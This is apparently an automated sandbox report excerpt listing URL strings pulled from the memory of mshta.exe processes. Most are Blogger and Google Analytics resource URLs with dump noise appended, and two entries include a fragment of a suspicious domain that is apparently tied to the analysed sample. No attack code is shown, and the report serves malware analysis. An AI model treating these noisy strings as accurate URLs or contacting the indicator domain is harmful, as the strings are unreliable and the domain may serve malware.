Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.430438198.000000000A2F8000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter)pLjf
Source: mshta.exe, 00000006.00000002.430438198.000000000A2F8000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter4X
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenterW
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenterh
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy2
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacyY
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacya
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy~
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/termszW
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000006.00000002.430438198.000000000A2F8000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials8
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorialsg
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388360976.000001BEED3B0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png&v
Source: mshta.exe, 0000001D.00000003.388360976.000001BEED3B0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngC:
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngR~
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngZw
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngc~
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngotrack.jsP)
Source: mshta.exe, 00000006.00000003.321658408.000000000A90A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngq(
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngs
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngssk
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngtice.jsst
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png~wy
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png/
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png9
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngkZ
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngGradientType=0blog
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=8965474558532949541&pageID=3337584593152806955&from=penci
Source: mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.391935095.00000290A7577000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/rpc_relay.html
Source: mshta.exe, 00000006.00000003.396883475.000000000684E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/rpc_relay.htmllet
Source: mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=bl
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=em
Source: mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=fa
Source: mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=pi
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=8965474558532949541&pageID=3337584593152806955&target=tw
Source: mshta.exe, 00000006.00000002.431162379.000000000A337000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.js
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jsk
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jso_
Source: mshta.exe, 00000006.00000003.383803015.000000000A2FF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1621653182-comment_from_post_iframe.jst.png~
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/1661466080-lbx.js
Source: mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.613292278.0000021CF7130000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js/v1/jsbin/3101730221-analyt
Source: mshta.exe, 00000021.00000002.580458210.0000021CF489D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js0
Source: mshta.exe, 0000001D.00000002.575052373.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js2
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js5
Source: mshta.exe, 0000001D.00000002.575052373.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js8b
Source: mshta.exe, 0000001B.00000002.596277403.00000215A89B4000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
Source: mshta.exe, 00000006.00000003.277065858.000000000A36B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsDu
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsb
Source: mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsc92231Z
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsd1A
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsjjC:
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsno
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsp%2Fayoolaayoola.html&type=
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jst
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jst.Q
Source: mshta.exe, 0000001D.00000002.540524758.000001B6E5ED0000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jstml%2522&type=blog&bpli=1
Source: mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsvi;
Source: mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js~
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js(
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js)5
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js.css
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js8))
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsOSZZl
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsS
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsae8))
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsd))
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jse
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsflate
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsk
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jss
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsss
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsz
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/592772849-lbx__en_gb.js
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574898077.000001BEEADD5000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css.w
Source: mshta.exe, 00000006.00000003.277113466.000000000A380000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css7
Source: mshta.exe, 00000006.00000003.277065858.000000000A36B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssC:
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssII
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssKv
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssKw
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css_
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css_.
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssm_
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssrC:
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssw
Source: mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/4076883957-lightbox_bundle.css
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/4076883957-lightbox_bundle.css//johonathahogyaabagebarhomein
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css...l
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css...x
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css0
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssR
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssaY
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssl
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284852801.000000000A33E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.432534150.000000000A38D000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.571748112.000001BEEACFA000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js
Source: mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js-n3
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js/
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js0
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js027821174359424672&zx=2c5db057-0ce4-4
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js1
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js2
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js680886694920034828&zx=ad70dca0-0e6f-4
Source: mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js690726786805467605&zx=1fe0aef2-8b4f-4
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.560022885.000001BEE8B29000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsC:
Source: mshta.exe, 00000006.00000003.284901391.000000000A352000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsLMEM
Source: mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsU
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsUv~E#
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsa
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsflate
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jshttps://johonathahogyaabagebarhomeint
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jskupD
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsola.html700
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsotrack.jsc
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsrder-bottom:1px
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsss
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jstyup.blogspot.com/p/backbone16.html%2
Source: mshta.exe, 00000006.00000003.271977332.00000000067CE000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.272117791.000000000A32D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/unvisited-link-
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/v
Source: mshta.exe, 00000006.00000003.383836757.000000000A359000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com6
Source: mshta.exe, 00000006.00000003.383836757.000000000A359000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.coma
Source: mshta.exe, 0000000D.00000003.516075909.00000290ACF21000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comgooglePlusBootstrapcmtInteractionsEnableddynamicViewsScriptSrclanguageDirecti
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comh
Source: mshta.exe, 00000006.00000003.299772001.000000000AE5E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comisAlternateRenderinglightboxModuleUrlrtdisableGCommentsateShare
Source: mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/O
